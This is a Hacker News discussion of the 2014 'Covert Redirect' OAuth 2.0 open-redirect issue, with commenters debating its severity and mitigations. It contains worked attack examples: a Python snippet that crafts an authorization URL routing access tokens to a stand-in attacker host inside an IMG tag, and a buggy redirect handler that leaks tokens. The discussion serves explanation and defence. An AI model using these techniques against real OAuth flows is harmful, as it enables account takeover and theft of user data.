Hacker News
OAuth 2.0 and OpenID Redirect Vulnerability (tetraph.com)
120 points by bevacqua on May 2, 2014 | 56 comments

Here's my understanding of this: 1) Bob uses example.com

2) Bob has authorized example.com to use Bob's Twitter account on his behalf, using OAuth 2

3) example.com happens to have an open redirect, an annoying and rather pervasive type of security vulnerability generally considered to be low-severity. (e.g. Google: "we hold that the usability and security benefits of a small number of well-designed and closely monitored redirectors outweigh their true risks.")

4) Mallory can now own Bob's Twitter account from any IMG tag on the Internet.

Step 1: generate a carefully crafted redirect URL which will start an OAuth authorization with the redirect URL designed to hit example.com but get 302ed to a page Mallory controls.

Step 2: put that URL in an IMG tag

Step 3: cause Bob to load that image. Twitter, noting that Bob has already auth'ed example.com on this device, handily elides a re-login and re-authorization and redirects Bob to the carefully crafted URL on example.com, which redirects him to Mallory's server

Step 4: Mallory now has a token which gives them Bob's Twitter account to play with
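Concretely, the crafted URL from steps 1-2 might be built like this (the provider endpoint, client_id, and all domain names here are invented for illustration):

```python
from urllib.parse import urlencode

# Step 1: build an authorization URL whose redirect_uri points at
# example.com's open redirect, which in turn forwards to a server
# Mallory controls. (Endpoint, client_id and domains are made up.)
open_redirect = "http://example.com/redirect?" + urlencode(
    {"url": "http://mallory.example/capture"})

authorize_url = "https://provider.example/oauth/authorize?" + urlencode({
    "response_type": "token",       # implicit grant: token returned in the redirect
    "client_id": "EXAMPLE_COM_CLIENT_ID",
    "redirect_uri": open_redirect,  # passes a naive prefix check for example.com
})

# Step 2: embed it somewhere Bob's browser will load it without a click.
img_tag = '<img src="{}">'.format(authorize_url)
```

The point is that the provider only sees a redirect_uri starting with example.com, so a prefix-style whitelist check passes even though the final destination is Mallory's server.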

Open redirects are a much more common issue than you'd think.

For example, we use elasticemail.com to send out emails. They encourage [1][2] people to set up a 'tracking' domain under their existing domain (i.e. tracking.yourdomain.com). They then rewrite links in outgoing emails to go through the tracking domain: http://tracking.yourdomain.com/track?redirect=[youroriginall...

It turns out that their tracking service is effectively an open redirect, and you've been encouraged by their documentation to set up that redirect. Now, if you have auth on your site via OAuth2 (e.g. Facebook login), you've got a hole.

Something like this could easily be set up by the marketing department without the engineers knowing anything about it.

Thanks to Egor Homakov for pointing this out to us.

  [1] http://support.elasticemail.com/kb/general-faq/why-do-my-links-route-through-the-elasticemailcom-domain-and-then-get-redirected-to-the-destination-url
  [2] http://elasticemail.com/post/what-is-a-custom-tracking-domain-and-why-is-it-important

The only aspect I'll take issue with is that in many (granted not all, but many) OAuth use-cases, the user is required to re-login to a site -- even if it was already authorized. The length of the cookie/token for an OAuth login varies, but more and more, I see very few services that don't require me to login again -- or at least manually click the "login" button.

So for step 3 to happen, Mallory needs to try to target a site that Bob is currently logged into or that has a session life that is still active. Otherwise, Bob still sees his Twitter login logo and he has to make a choice to click or retreat.

I am being a bit slow today. How did Mallory come into the picture at step 4? By exploiting some other web app vulnerability on example.com?

Example.com has an open redirect; say http://example.com/redirect?url=xxxxx

Craft the OAuth URL to Twitter passing the callback as http://example.com/redirect?url=http://mallory.com/capture.

Now Mallory can access the parameters passed back by Twitter at /capture on their server.


1. You have to look at the referer to get the tokens, no?

2. OAuth 1.0a isn't vulnerable because the requests are signed with a secret, correct?

My understanding is that OAuth 1.0a isn't vulnerable because in that spec, the access_token isn't part of the post-user-authorization redirect (http://tools.ietf.org/html/rfc5849#section-2.2), while it is in OAuth 2.0 (http://tools.ietf.org/html/rfc6749#section-4.2.2).

So, in OAuth 2.0 the redirect URI could be set up to expose the access token. In OAuth 1.0a, the only things that could leak are the request token and verifier code, but without the original client credentials, they can't be exchanged for an access token.
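To make that concrete, compare what each spec puts in the post-authorization redirect (the URLs are illustrative; the token values are taken from the RFCs' own examples):

```python
# OAuth 1.0a (RFC 5849): the redirect carries only a temporary request
# token and a verifier; exchanging them for an access token requires
# the client's secret, which the attacker doesn't have.
oauth1_redirect = ("http://example.com/callback"
                   "?oauth_token=hh5s93j4hdidpola&oauth_verifier=hfdp7dh39dks9884")

# OAuth 2.0 implicit grant (RFC 6749 section 4.2.2): the access token
# itself rides along in the redirect, so leaking the redirect URL
# leaks access to the account.
oauth2_redirect = ("http://example.com/callback"
                   "#access_token=2YotnFZFEjr1zCsicMWpAA&token_type=bearer")
```

So an attacker who captures the OAuth 1.0a redirect still has nothing usable, while capturing the OAuth 2.0 implicit-grant redirect hands them the bearer token directly.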

Actual source: http://tetraph.com/covert_redirect/oauth2_openid_covert_redi...

I was expecting an authentication bypass vulnerability, but this is just an open redirect. It is not "serious".

I think this is even covered in the spec.

  The authorization server MUST require the following clients to
   register their redirection endpoint:

   o  Public clients.

   o  Confidential clients utilizing the implicit grant type.

   The authorization server SHOULD require all clients to register their
   redirection endpoint prior to utilizing the authorization endpoint.

The OAuth servers I have developed have done like GitHub does [1] and at least confirm the redirect given during auth starts with the application-level URI. I think it gives plenty of flexibility while still not openly redirecting. Edit: Or maybe I don't understand the flaw since it says GitHub is vulnerable...

1 - https://developer.github.com/v3/oauth/#redirect-urls

Good OAuth 2.0 and later implementations enforce this. Note that Twitter does not fall into that category.

I'm relatively familiar with OAuth 2, but I don't quite grok this.

So, normally: I, a site that uses OAuth to access someone's Google / Twitter / etc. account, register a redirect URI where users, after authorizing or denying, are sent along with an access key.

The vuln is that my redirect URI can be exploited by someone to send users on to a different site, with their access key?

How could an attacker manipulate a URL to redirect somewhere else? Content injection? Like some users whose name is a script that changes window.location? Doesn't nearly every templating language explicitly require special stuff like {{{ }}} for unsafe content?

If that's correct, it seems a little overblown. But maybe I'm wrong.

> How could an attacker manipulate a URL to redirect somewhere else?

A site begins writing software to OAuth with Facebook. They start by filling out a form on Facebook with their app name and the callback URL to their site. They then write a handler on their site for dealing with the callback URL they expect to receive from Facebook after the user approves the connection with their app. However, the week before the company did OAuth integration, there was a ticket opened for 'redirect user to correct page after login' which was implemented with a '?next=http://urlofyourchoosing.com/' decorator handler written by the Swedish intern.

The redirect parameter isn't going to be compared by Facebook. Only the base URL is going to be checked to ensure it matches.

Once OAuth integration is complete and tested, the site launches. They get on the front page of HN, Reddit and Mashable and sign up about 100K users in a few weeks. In the meantime, a bad actor discovers the flaw in their login flow, tests the behavior, and discovers the ?next redirect vulnerability. They know the site uses Facebook, so they craft a URL to do OAuth with Facebook, then redirect the user to the attacking site by using the ?next parameter in the third party's website code. They then use the current bad-actor method of propagating their evil URLs and ... profit?

Impact: Any action by the user allowing access to data will, in theory, allow the attacker to view the information the user gave the site access to and, possibly, more information than the user originally approved for the site if they accidentally chose another security scope. It should be noted that all access by the user to both Facebook and the attacked website will be logged by their respective servers.

I implemented an OAuth2 workflow with Github to an AppEngine project last year, so I'm at least passingly familiar with what goes on under the hood with the flows. Still, I could be missing something here. I might try to hack up a working example to test my theory.

I read all the above and I still don't see how the attacker would "gain access" to the user's info on the platform. How do they get the bearer token?

?next=URL is usually implemented to redirect to the URL, and won't propagate the bearer token off the app to the attacker's site. What am I missing?

Given that you implemented it correctly, I would agree with you. A bad implementation would allow for preservation of the URL's parameters, à la urllib.urlencode(self.request.params) or similar, which would contain the token.
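A minimal sketch of that leaky pattern, using only the stdlib (the handler and all URLs are invented; real frameworks expose the same data through request objects):

```python
from urllib.parse import urlencode, urlsplit, parse_qsl

def bad_next_redirect(request_url):
    """Buggy ?next handler: redirects to `next` and, worse, re-appends
    every other incoming query parameter -- including an OAuth code or
    token that came back from the provider -- onto the destination."""
    params = dict(parse_qsl(urlsplit(request_url).query))
    target = params.pop("next")
    # The bug: blindly forwarding the remaining parameters cross-domain.
    return target + "?" + urlencode(params)

leaked = bad_next_redirect(
    "http://example.com/login?next=http://mallory.example/&code=SECRET_CODE")
# leaked is now "http://mallory.example/?code=SECRET_CODE"
```

A correct handler would validate `next` against a whitelist of same-origin paths and drop the other parameters entirely.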

This assumes the URL that processes the ?next request passes the info in a cross-domain way, i.e. GET vars or POST.

Everyone does cookies or backend storage.

Unless you can compromise the target's DNS, this is impossible to exploit except on very lousy sites... but if they are bad to that point, you probably already have local shell access.

When you are redirected from Facebook - either after clicking "Accept" or in an implicit flow - to the page with the next parameter, and that page redirects to attacker.com, then attacker.com will have access to the referer header†, which contains the access token. Using this access token, an attacker could extract the sensitive information from the victim's Facebook account.

† there are a few exceptions when the referer header isn't sent, e.g. an HTTPS->HTTP redirect, but an attacker could make sure that the referer header would be sent for the majority of victims

Always assumed the response was via POST... It's silly to use GET/the URL for that. Any ad or external library on the page can already see it, and everyone logs referer headers. Even loading custom fonts directly from Google is already advertising your tokens...

From the Q&A:

> Covert Redirect is based on the vulnerability Open Redirect. An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation (OWASP). So Covert Redirect is an application that takes a parameter and redirects a user to the parameter value with improper validation. Usually this is the result of overconfidence in its partnership.

Seems like a known flaw in OAuth2.

The flow does not originate at your site. Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

The URL is generated by a malicious party. The URL constructed (1) sends the user to Google / Twitter for authentication, (2) includes a return URL of your open redirector, and (3) has your open redirect send you on to an evil site.

> Your site did not create the redirect URI that is being passed to Google / Twitter in your example.

Sorry, I don't understand this sentence.

The redirect URI is not normally passed to Google / FB / Instagram dynamically; it's normally registered with Google / FB / Instagram once, when you set up an app with them (and get a secret key etc).

If someone else registered their own app with their own redirector, they wouldn't have my secret key.

Edit: removed Twitter; they use OAuth 1, which is strange / different / weird.

No, you do pass the URI dynamically, it's a required part of the Access Token Request: http://tools.ietf.org/html/draft-ietf-oauth-v2-16#section-4....

It's just that with a decent implementation, you should also be required to register it beforehand with the provider.

Not just a decent implementation; an implementation which meets the spec. This is not a problem with OAuth2, which explicitly requires registration of URIs where the implicit grant type is used, and covers other cases well in the Security Considerations section.

That makes a lot of sense: I've only really dealt with OAuth 2, as OAuth 1.0a is vastly more complicated and only Twitter seems to still use it.

Thanks icebraining & vertex-four.

I'm trying to understand this too. This is only a problem if the OAuth provider (Google, Twitter, etc) does not validate the URL that the client is trying to redirect the user to after the user has authorized the app, correct?

Typically you pre-register a whitelist of redirect URLs with your OAuth provider. For example, you might whitelist example.com/app/* because you control the app and assume that you won't do anything evil. If /app/ includes an open redirect (generally considered to be Severity: Nominal), your application can be made to attack every user who grants it permissions, to the limit of the permissions they entrust your application with.
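A sketch of why a prefix whitelist alone doesn't help once an open redirect lives under the whitelisted prefix (the check and all URLs are illustrative, not any particular provider's implementation):

```python
def provider_allows(redirect_uri, whitelist_prefix="http://example.com/app/"):
    """Naive prefix check, as many providers implement it."""
    return redirect_uri.startswith(whitelist_prefix)

# The legitimate callback is allowed, as intended.
assert provider_allows("http://example.com/app/oauth/callback")

# But an attacker's URI also passes, because it sits under the
# whitelisted prefix -- the open redirect at /app/redirect then
# forwards the user (and token) onward to the attacker.
evil = "http://example.com/app/redirect?url=http://mallory.example/capture"
assert provider_allows(evil)
```

This is why the whitelist is only as strong as the weakest endpoint under it: one open redirect inside /app/ turns the whole registration into a formality.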

Not sure if this is news. The lead author of OAuth 2 resigned from the OAuth working group 2 years ago, citing all the security flaws inherent in the OAuth 2 spec.


OP just spells out one way to take advantage of OAuth 2, and tacks on a sensational title.

Agreed; I thought that the general consensus was that OAuth2 was severely flawed (and why many sites stuck with OAuth1). Been a few years since I worked with OAuth though, so I could be wrong.

OpenID Connect is the most current spec in that world.

This seems painfully sensationalized to me. Unrestricted OAuth redirect URIs paired with not requiring signed requests has been known to be dangerous. Google and Facebook both have configurable whitelists for OAuth redirect URIs.

Yeah, I was struggling to understand this, since I recently implemented a Facebook OAuth client and it prevented me from setting any redirection URL outside the configured domain, so I don't see how Facebook is vulnerable.

Frankly, much ado about nothing.

This is only a vulnerability if you have an "open redirect" somewhere on your domain.

Do you have any URLs that look like this?

  http://yoursite.com/redirect?url=http://othersite.com/

That's an open redirect, and can be used by an attacker to work around the domain whitelist.

Open redirects are bad news for a bunch of other reasons. The solution is to always guard them with an additional signed parameter derived from the URL and a secret.
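One way to implement that signed-parameter guard (a sketch only; the key, function names, and encoding choices here are assumptions, and real key management is up to you):

```python
import hashlib
import hmac

SECRET = b"server-side-secret-key"  # hypothetical; never ship a hardcoded key

def sign_redirect(url):
    """Signature a trusted page attaches when it emits a redirect link."""
    return hmac.new(SECRET, url.encode(), hashlib.sha256).hexdigest()

def safe_redirect(url, sig):
    """Only follow the redirect if the signature checks out."""
    expected = sign_redirect(url)
    # compare_digest avoids timing side channels on the comparison.
    return hmac.compare_digest(expected, sig)

good = "http://example.com/welcome"
assert safe_redirect(good, sign_redirect(good))
# An attacker can't forge a signature for their own destination:
assert not safe_redirect("http://mallory.example/capture", sign_redirect(good))
```

Since only your server holds the secret, an attacker can't mint a valid `sig` for an arbitrary destination, which closes the open redirect without needing to enumerate every legitimate target.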

The point is that large OAuth2 providers have open redirects themselves at the authorization endpoint, by not requiring all clients to register their redirection URIs. This directly violates the spec's registration requirements, and is further warned against in section 10.15.

In combination with the implicit flow, this means that an attacker can ask the provider to authorize any client to access their data, but actually send the access token to the attacker's URL.

The interesting thing is... if providers actually followed all MUSTs and SHOULDs, this would not be a problem. The providers explicitly decided to allow this variety of problem to happen.

Correct me if I'm wrong, but it seems this isn't even news. It's by design - something inherent to the OAuth authentication scheme.

Also both CNet and the original are so light on details it's scary. I get the feeling though that we've entered an era for "vulnerability sites" - instead of CVEs we're now getting marketing.

>instead of CVEs we're now getting marketing.

Well, that is what patio11 and others were calling for after Heartbleed. More marketing! More selling yourself! Always be selling!

Yeah, that guy's site reminds me of the site which was set up for the heartbleed vulnerability. Heartbleed probably justified its own site since it was such a big deal. I'm not sure this qualifies. Maybe people are starting to think that they can call attention to known weaknesses with a dedicated site and get some cred. As you said, kind of a marketing tactic.

1) It is nothing new. 2) The original article is so unclear that I can't tell which of the two bugs the author meant.

This is an example of using the marketing lessons[1] for Heartbleed to over-promote a known issue that is actually accounted for IN the OAuth 2.0 spec.

Not every technology reporter is spreading false fear, however. If I got anything wrong in my post, reach out and I'll gladly correct.

[1]: http://mashable.com/2014/05/02/oauth-openid-not-new-heartble...

Dubbed "Covert Redirect," the flaw could enable phishing sites to grab a user's login information.

I realize you write for a generalist audience, but this phrasing does not evince understanding of the vulnerability.

Users can choose to trust third-party applications to do certain things on Facebook/Google/Twitter/etc on their behalf. This vulnerability allows an attacker who is not affiliated with that trusted third party to perform those same actions. Those actions include, but are not limited to, "share information about me with my trusted 3rd party."

This is not related to phishing sites. At all. It is possible to compromise a user without ever needing to ask for their credentials (on either a phishing site or a legitimate site), because users are customarily logged into Facebook/Google/Twitter/etc. That's a major part of the attraction for using them as net-wide identity providers, both for third-party sites and for users.

It's important to note, however, that in order to take advantage of this vulnerability in the first place, a user has to click on a link or visit a malicious website.

Security researchers generally consider this to not be a meaningful hurdle, as you can induce people's browsers to load a URL without any action on their part. If you can post a cat photo, you can post an attack. Have you viewed a cat photo recently from someone who you wouldn't trust with operating your Facebook account? Well, if you've previously entrusted a third party to use your Facebook (or similar) account on your behalf and that third party has an open redirect on their website, that cat photo could have also operated your Facebook account to the same extent you permitted the third party to.

To avoid offering up information to a malicious website, users should only log into Facebook or other services through sites that they trust. If a site looks sketchy, don't do it. Standard anti-phishing practices apply here.

This will not, in fact, help. That's the point. You trust ESPN.com to not abuse you. You use their integration with Facebook. You diligently check your browser and are sure you're only looking at ESPN and Facebook. Everything goes perfectly.

Three weeks later a cat photo on a website which is neither ESPN nor Facebook steals your information.

Maybe a more motivational example is operating your Twitter account for you? Say you enter a contest on ESPN. ESPN might ask, as a condition of the contest, that you Tweet "ESPN: it's not on your cell phone #wegetsocialmedia." There exists a particular way to implement that which gives them the ability to tweet whatever they want through your account, but you might come to the semi-sensible decision that they're ESPN so they're clearly not going to do anything malicious with your Twitter account.

3 weeks later, you load a cat photo, and your followers start asking you why you suddenly are interested in promoting alternative takes on Middle Eastern geopolitics or encouraging them to buy male enhancement supplements.

Some good points all around -- I've made edits trying to better frame the scenario.

>Generalist audience point

That actually was a rephrasing of my original description.

The point about malicious sites -- phishing sites -- is that those are the sites (or compromised sites) that will serve links with the bad redirects.

A co-existing XSS flaw notwithstanding (which has happened before and is realistically the best vector for altering the links), I don't think it's unfair to frame this as something that happens as a result of clicking a bad link from a site that is either malicious or has been hacked.

Obviously, there are exceptions -- and I'll make that more clear -- but I'm seeing it framed as if "every Facebook login you click could be hijacked" -- and that's just not true.

>To the ESPN point

Right -- if ESPN gets hacked, or an XSS flaw lets someone alter their links and trigger the redirects -- that's definitely a real problem. That's why some of the onus is on ESPN to make sure they define their redirect URIs in OAuth 2.0. It's also why Facebook should make it an absolute requirement for using Facebook login.

Not to mitigate the fact that this is a real flaw at all - but I think we can all agree this isn't some new discovery. It's a well-known problem. Calling this the new Heartbleed won't make it any better.

If the redirect URI is registered and compared by the authorization server as required by the OAuth2 and OpenID Connect specifications, this is not an issue.

The OAuth 2 implicit flow encodes the access token in the URI fragment to prevent leaking in referrer or 302 redirects.
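For example (the token value is borrowed from RFC 6749's examples): the fragment never appears in the HTTP request line, so a plain 302 from the callback page cannot forward it to another server.

```python
from urllib.parse import urlsplit, urlunsplit

# The browser keeps the fragment client-side; only the parts before
# the '#' are sent to the server (and into referer headers).
redirect = "http://example.com/callback#access_token=2YotnFZFEjr1zCsicMWpAA"
parts = urlsplit(redirect)

what_the_server_sees = urlunsplit(
    (parts.scheme, parts.netloc, parts.path, parts.query, ""))
assert what_the_server_sees == "http://example.com/callback"
assert "access_token" in parts.fragment  # readable only by client-side script
```

That is why extracting the token from the fragment normally requires attacker-controlled JavaScript running in the victim's browser, not just a server-side redirect chain.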

It seems that the person who discovered this Facebook vulnerability somehow broke fragment processing in their browser to make their YouTube video work.

I will say that ESPN went to a lot of work to create an open redirector that preserves query parameters from the origin URI; you don't see that every day. So if anything, the discoverer should get some credit for finding an ESPN issue, but it is not more general than that and could not be used to exploit Facebook unless combined with some other browser bug to turn off fragment processing in the browser.

Just to be sure, how is Google's OAuth2 implementation vulnerable to this?

As I understand it: the attacker exploits the fact that your application does not validate the redirect_uri parameter. Google's API keys all have whitelists for redirect_uri's. So those can't be exploited, right? Then the only problem is that those redirect_uri's themselves can perform redirects (in Google's case you can put arbitrary data in the 'state' get parameter so you could put another redirect_uri in there) but you can validate those too (on your whitelisted redirect_uri page... and you are advised to do CSRF checks anyway). So in this case, where is the vulnerability? I don't see it.

I'm familiar with the OAuth2 spec (RFC 6749). I can't find enough details to actually understand the claimed vulnerability. Does it affect a specific flow? It sounds like the Implicit Grant (http://tools.ietf.org/html/rfc6749#section-4.2).

> Covert Redirect flaw uses the real site address for authentication.

That is so vague. Are they claiming the attacker is hijacking the redirect_uri parameter?

Are they saying that these third parties aren't comparing the redirect_uri? I can't think of an OAuth2 server I've interacted with as a developer that hasn't required you to register a redirect_uri.

Anyone have more details?

Most important is this line which demonstrates not only does the attacker need to social engineer a user, it has to be done via a vulnerable website:

> The patch for this vulnerability is easier said than done. If all the third-party applications strictly adhered to using a whitelist, there would be no room for attacks. However, in the real world, a large number of third-party applications do not do this, for various reasons.

Facebook, etc. aren't insecure directly; their 3rd-party partners are, for not implementing a URL whitelist. This website chose to bury that fact. This explains why Facebook is aware of the issue and has not addressed it.

It turns out, identity, authentication and security in general are hard.

In some sense, it takes episodes like the NSA revelations, Heartbleed, and this OAuth nonsense to remind us how important knowing who you're talking to is on the Internet. It's hard to determine authenticity heuristically, and even harder with faulty signals.

More transparent security seems like a positive thing and yet the market forces are strictly against such an idea for obvious reasons (witness do not track).

I don't know how this will shake out, but if history has told me anything, it's to be hopeful for a better tomorrow.

We changed the url from [1] and demoted the post since the consensus in the thread is that it's overblown.

1. http://www.cnet.com/news/serious-security-flaw-in-oauth-and-...

Thank you for the transparency here.

Can I respectfully suggest that, in the future, consensus among HN readers is not always sufficient to judge whether certain facts about nature are actually true or not? I don't know whether it's the fault of our Chinese not being as good as this gentleman's English or just a bum draw on software security commenters today, but my read of this thread is that few people understand the claim well enough to state what is at risk and for whom, to say nothing of judging its severity.

> consensus among HN readers is not always sufficient to judge

No question that's true. I'm painfully aware of it.

Moderating the front page is a guessing game. We're not experts in everything (or, if it comes to that, anything), so we guess wrong. But we always welcome correction.

If we thought the article was false, we would have buried it. The reason we penalized it was rather because it spent several hours getting upvoted in part (I surmise) because of the sensationalism of the original article, which is mostly what people were complaining about. We put a moderate penalty on the article as a way of rebalancing that, and also because several other things about this article seem (<-- that's another guess) a bit below the usual standard.

If this is wrong, I'm happy to reverse the decision.

How is this any different than the signed request (redirect_uri) vulnerability? http://homakov.blogspot.com/2014/01/two-severe-wontfix-vulne...

Not different at all.

Heh, thanks Egor!

A bigger question I have is: what if an attacker gets access to your database? Don't they then get all the user data of your service in the open? Do we hash and salt passwords only because of password re-use?

I don't see how this is 'breaking news'; pretty sure OAuth has many similar known issues. This is nothing at all like Heartbleed.

Wow they even made a logo for this vulnerability of minor severity.

Yeah, and the logo is explained before any serious details about the actual vulnerability are even mentioned.

But there it is alongside Heartbleed in the same CNET article, so it must be serious. So serious. Wow.
